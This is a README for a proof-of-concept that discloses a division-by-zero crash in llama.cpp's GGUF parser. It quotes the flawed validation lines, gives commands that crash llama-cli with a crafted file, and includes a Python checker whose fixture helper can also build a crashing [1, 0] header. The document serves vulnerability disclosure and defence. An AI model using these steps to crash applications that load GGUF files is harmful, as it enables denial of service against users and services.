PoC: llama.cpp GGUF Division by Zero via Zero-Dimension Tensor

This repository contains a proof-of-concept for a security vulnerability. It is intended for responsible disclosure via huntr.com.

Vulnerability

The GGUF parser in llama.cpp (ggml/src/gguf.cpp) allows tensors with zero-valued dimensions to pass validation: line 623 checks `< 0` instead of `<= 0`. The integer-overflow check at lines 632-634 then divides INT64_MAX by ne[1], ne[2] and ne[3], so a zero in any of those dimensions is a division by zero.

Vulnerable code:

// Line 623: allows ne[j] == 0
if (info.t.ne[j] < 0) {  // should be <= 0

// Lines 632-634: divides by ne[1], ne[2], ne[3]
if (ok && ((INT64_MAX/info.t.ne[1] <= info.t.ne[0]) || ...))
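The corrected condition can also be applied before a file is ever handed to llama.cpp. The following pre-load check is an added example, not code from this repository or from llama.cpp: it walks the GGUF header (v2/v3 layout), skips the metadata key/value pairs and rejects any tensor whose dimension would fail `ne[j] <= 0`. The `fixture` builder, its tensor name and its single metadata pair are constructed here for the check; they are not the repository's PoC file.

```python
import struct

GGUF_MAGIC, GGUF_STRING, GGUF_ARRAY = b"GGUF", 8, 9  # metadata value type ids for string and array
SCALAR_FMT = {0: "B", 1: "b", 2: "H", 3: "h", 4: "I", 5: "i", 6: "f", 7: "?", 10: "Q", 11: "q", 12: "d"}


class Cursor:
    """Little-endian reader over GGUF bytes; only the header (KV pairs, tensor infos) is walked."""
    def __init__(self, data):
        self.data, self.pos = data, 0
    def read(self, fmt):
        vals = struct.unpack_from("<" + fmt, self.data, self.pos)
        self.pos += struct.calcsize("<" + fmt)
        return vals[0] if len(vals) == 1 else vals
    def string(self):                # uint64 length prefix, then raw UTF-8 bytes
        return self.read("%ds" % self.read("Q")).decode("utf-8", "replace")
    def skip_value(self, vtype):     # metadata values are not needed for this check
        if vtype == GGUF_STRING:
            self.string()
        elif vtype == GGUF_ARRAY:
            etype, count = self.read("IQ")
            for _ in range(count):
                self.skip_value(etype)
        else:
            self.read(SCALAR_FMT[vtype])


def find_zero_dim_tensors(data):
    """[(name, dims)] for tensors failing ne[j] <= 0; ggml keeps ne as int64, so >= 2**63 is negative there."""
    c = Cursor(data)
    magic, version = c.read("4sI")
    if magic != GGUF_MAGIC or version < 2:
        raise ValueError("not a GGUF v2+ file")
    n_tensors, n_kv = c.read("QQ")
    for _ in range(n_kv):            # metadata KV pairs precede the tensor infos
        c.string()
        c.skip_value(c.read("I"))
    bad = []
    for _ in range(n_tensors):
        name, n_dims = c.string(), c.read("I")
        dims = [c.read("Q") for _ in range(n_dims)]
        c.read("IQ")                 # ggml type and data offset
        if any(d == 0 or d >= 1 << 63 for d in dims):
            bad.append((name, dims))
    return bad


def fixture(dims, name=b"token_embd.weight"):
    """Constructed GGUF v3 header (not the repository's PoC file): one string KV pair, one F32 tensor."""
    kv = struct.pack("<Q", 20) + b"general.architecture" + struct.pack("<IQ", GGUF_STRING, 5) + b"llama"
    hdr = GGUF_MAGIC + struct.pack("<IQQ", 3, 1, 1) + kv + struct.pack("<Q", len(name)) + name
    return hdr + struct.pack("<I%dQIQ" % len(dims), len(dims), *dims, 0, 0)
```

`find_zero_dim_tensors(fixture([1, 0]))` flags the tensor with the same `[1, 0]` shape the PoC uses, while a sane `[4, 8]` header returns an empty list.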

Files

  • malicious_div_zero.gguf: crafted 128-byte GGUF file with tensor dimensions [1, 0]
  • poc_llama_cpp_div_by_zero.py: script that generates the PoC file and explains the vulnerability

Reproduction

# Build llama.cpp
git clone https://github.com/ggerganov/llama.cpp && cd llama.cpp
cmake -B build && cmake --build build -j

# Trigger crash (x86_64: SIGFPE)
./build/bin/llama-cli -m malicious_div_zero.gguf

Impact

Denial of service (process crash via SIGFPE on x86_64) for any application loading crafted GGUF files.

Researcher

Ryan, Fan Pier Labs (ryan@fanpierlabs.com)
